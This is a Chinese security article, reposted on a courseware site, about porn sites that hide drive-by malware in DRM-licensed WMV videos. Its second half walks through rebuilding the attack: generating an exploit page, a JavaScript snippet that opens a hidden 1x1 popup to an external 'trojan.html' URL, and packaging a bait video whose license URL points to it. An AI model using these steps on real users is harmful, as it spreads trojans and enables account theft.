课件首页flash课件网络试题教案学档说课稿考研真题课时学案精品作文工作总结实用文档教学论文个人简历论文中心考试中心教学素材文学作品法律文书幼儿教育软件科技英语学习学习教程党团社会故事大王科普知识中考专题高考专题

网络安全教程:色情网站如何用DRM挂马敛财

发布时间:2017-12-14 00:04  作者:极品课件站  点击数:

  如今的挂马集团可以说是盗号产业链中的霸主,他们掌控着挂马平台,牟取暴利。为了收集挂马资源,他们会使用各种挂马技术,甚至是研发自己的挂马技术。经过追踪发现一个挂马集团研究出数字版权证书挂马的技术(也称DRM挂马),该挂马技术还是第一次被发现。

  安全小百科:DRM的中文全称是数字版权管理,指的是出版者用来控制被保护对象的使用权的技术,这些技术保护的对象是数字化内容,例如软件、音乐、电影等。

  “加拿大阳光国际娱乐集团”,这个声称在加拿大注册但网站服务器在美国华盛顿的公司,控制着多达20多个中文色情网站。这些网站频繁更换域名,绕过国内网络安全的防线,将淫秽内容倾倒给中国网民。

  这些色情网站以每年300元的年费大肆敛财,月收入估计过千万元,不过这并没有满足犯罪集团的欲望,他们还利用色情视频挂马,“拓宽”了收入来源。根据这些色情网站访问量保守计算,该集团至少已经控制近千万台“肉鸡”。

  那么加拿大阳光国际娱乐集团是通过什么方式获取大量“肉鸡”的呢?首先,他们通过色情P2P下载网站布下诱饵,吸引那些经不住诱惑的用户访问网站,然后再诱使用户下载带木马的色情视频,木马一旦成功进入用户的电脑就会暗中进行盗号活动。与以往通过溢出攻击用户的色情视频不同,这些色情视频是通过数字版权证书传播病毒的,也被称为DRM挂马。

  数字版权证书成挂马利器

  数字版权证书应用非常广泛,许多在线音乐商店都在使用,例如苹果公司的iTunes Store。利用DRM的挂马方式有许多种,比如加拿大阳光国际娱乐集团就是通过Windows Media Player内置的数字版权来进行挂马的。

  当一段WMV视频被加入DRM证书之后,Windows Media Player播放这种带DRM证书的视频时会先弹出一个DRM认证网页窗口,去访问视频指定的版权认证网页。由于弹出的DRM认证网页并不具备阻止弹窗等功能,因此黑客能够利用认证网页进行挂马,轻松逃避许多杀毒软件的追查(图1)。

  当用户点击WMV的视频后,Windows Media Player启动后立刻弹出了一个DRM数字版权认证小窗口,随后又连续弹出了众多恶意网站,在这些恶意网站中,内置了各种各样的木马。

  DRM挂马还可以修改弹出网站的恶意代码,变换恶意网页中的挂马手段,即时躲过杀毒软件的查杀。即便是IE7也不能够阻止其弹出窗口,除了能拦截网页木马的安全辅助工具外,几乎没有其他办法能阻止其弹出恶意网站的窗口。

  模拟数字版权证书挂马

  黑客是如何实现这种高明的挂马方法的呢?我们通过研究,将黑客DRM挂马的方式完全还原呈现了出来。

  步骤1:利用网页木马生成器生成一个SWF木马或者其他能够溢出攻击电脑的木马(越新的漏洞溢出几率越大)。接着生成溢出网页,将网页上传到自己指定的网站中。

  步骤2:用JS脚本写一段弹窗代码,如果黑客愿意可以让网页弹出多个窗口,但是弹出的窗口必须指向含有恶意溢出代码的网页地址。写好弹窗代码后保存为HTML格式的网页,也上传到网站中。JS弹窗代码如下:

  <SCRIPT language=javascript>
  window.open("http://www.ruijia.cn/木马.html","","toolbar=no,location=no,directories=no,status=no,menubar=no,scro llbars=no,width=1,height=1");
  </script>
 

  步骤3: DRM挂马的关键操作步骤到了。黑客会先准备一个WMV格式视频文件,我们这里随意搜索下载一段WMV视频作为我们的诱饵。诱饵视频准备好后,下载并安装一款名为《DRM音频视频加密器》的软件,在软件界面中选择“自定义打包”选项,然后单击“源文件设置”后面的“浏览”按钮,选中我们准备好的诱饵视频文件(图2)。  

  步骤4:点击“认证字符串”标签,然后在“填写认证字符串”下的“认证URL”处输入我们指定的弹窗网页网址,点击“保存”按钮(图3)。  

  步骤5:回到“自定义打包”标签中,点击“文件输出”下方的“选择”按钮,选择DRM认证视频的输出位置。选择好后直接单击下方的“打包加密”,此时软件会弹出一个打包成功的提示,一个会弹出恶意DRM认证网页的视频文件就制作出来了(图4)。

  我们制作的测试视频成功地弹出了我们指定的博客页面(图5)。

 

作者:墨斗鱼责任编辑:杨玲)

天极新媒体 最酷科技资讯

扫码赢大奖

评论

* 网友发言均非本站立场,本站不在评论栏推荐任何网店、经销商,谨防上当受骗!

 关于本站    网站帮助    广告合作    下载声明  
Copyright ©2006-2010ss All Rights Reserved.
浙ICP备09021635号

友情链接/网站合作咨询:

©2011 - 2018 版权所有 All Rights Reserved